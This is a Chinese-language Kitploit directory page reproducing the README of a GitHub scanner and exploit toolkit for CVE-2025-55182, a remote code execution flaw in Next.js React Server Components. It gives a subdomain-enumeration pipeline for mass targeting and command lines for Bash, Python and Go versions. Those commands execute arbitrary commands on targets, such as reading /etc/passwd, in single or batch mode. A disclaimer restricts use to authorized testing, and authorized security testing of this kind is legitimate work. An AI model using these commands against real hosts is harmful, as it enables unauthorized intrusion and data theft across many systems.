Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-Simple-Scanner-main — 用于Next.js React Server Components中CVE-2025-55182 RCE的多语言扫描器,具有单次/批量扫描模式,并集成了漏洞赏金侦察工作流。 | Kitploit
工具/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试子域名枚举学习与教育
GitHubjan0x190/cve-2025-55182-simple-scanner-main

CVE-2025-55182-Simple-Scanner-main

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

用于Next.js React Server Components中CVE-2025-55182 RCE的多语言扫描器,具有单次/批量扫描模式,并集成了漏洞赏金侦察工作流。

查看仓库
149个月前尚未审核

CVE-2025-55182:React Server Components RCE 扫描器

一个用于检测和利用 CVE-2025-55182 的全面工具包,这是 Next.js 应用程序中 React Server Components 的一个严重远程代码执行漏洞。

该仓库包含一个统一的 Bash 扫描器(单目标与批量模式)、Python/Go 实现以及一个漏洞赏金侦察工作流。

Scanner Menu Scanner Demo


📂 仓库结构

  • scanner.sh — 适用于单目标和批量扫描的全功能 Bash 脚本
  • python/exploit.py — 稳定的 Python 实现(更好的 JSON 转义处理)
  • go/main.go — 高性能实现(可编译)

🚀 侦察工作流(漏洞赏金方法)

针对通配符域名进行批量挖掘时,使用以下管道过滤目标后再扫描:

root@kitploit:~
# 1. 枚举子域名
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. 筛选存活主机
httpx -l subs.txt -o live.txt

# 3. 使用 Nuclei 进行预扫描检测(可选)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Bash 扫描器使用方法(推荐)

scanner.sh 脚本支持单目标扫描和从文件列表进行批量扫描。

🔧 安装

root@kitploit:~
chmod +x scanner.sh

1️⃣ 单目标模式

最适合通过详细输出验证特定目标。

root@kitploit:~
# 基本检查(默认使用 "id" 命令)
./scanner.sh -d example.com

# 执行自定义命令
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ 批量扫描模式

高效扫描 URL 列表,并将存在漏洞的主机保存到文件。

root@kitploit:~
# 扫描 URL 列表
./scanner.sh -l live.txt -c "whoami"

# 自定义输出文件
./scanner.sh -l live.txt -o my_bounty.txt

选项说明


🐍 Python 版本

如果在 Bash 中转义特殊字符遇到问题,请使用此版本。

依赖

root@kitploit:~
pip install requests

使用

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Go 版本

高性能,依赖极少。

直接运行

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

编译为二进制文件

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ 免责声明

本工具仅用于教育目的和授权的安全测试。 未经授权使用是严格违法的。 开发人员对因滥用或使用本程序造成的任何损害不承担任何责任。


🔗 参考资料

  • NVD CVE 详情: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • React 安全公告(React Server Components 漏洞): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • ProjectDiscovery Nuclei 模板: https://cloud.projectdiscovery.io/library/CVE-2025-55182

下载工具
标志描述
-d, --domain单个目标 URL
-l, --list包含 URL 列表的文件
-c, --command要执行的命令(默认:id)
-o, --output漏洞主机的输出文件(默认:vulnerable_hosts.txt)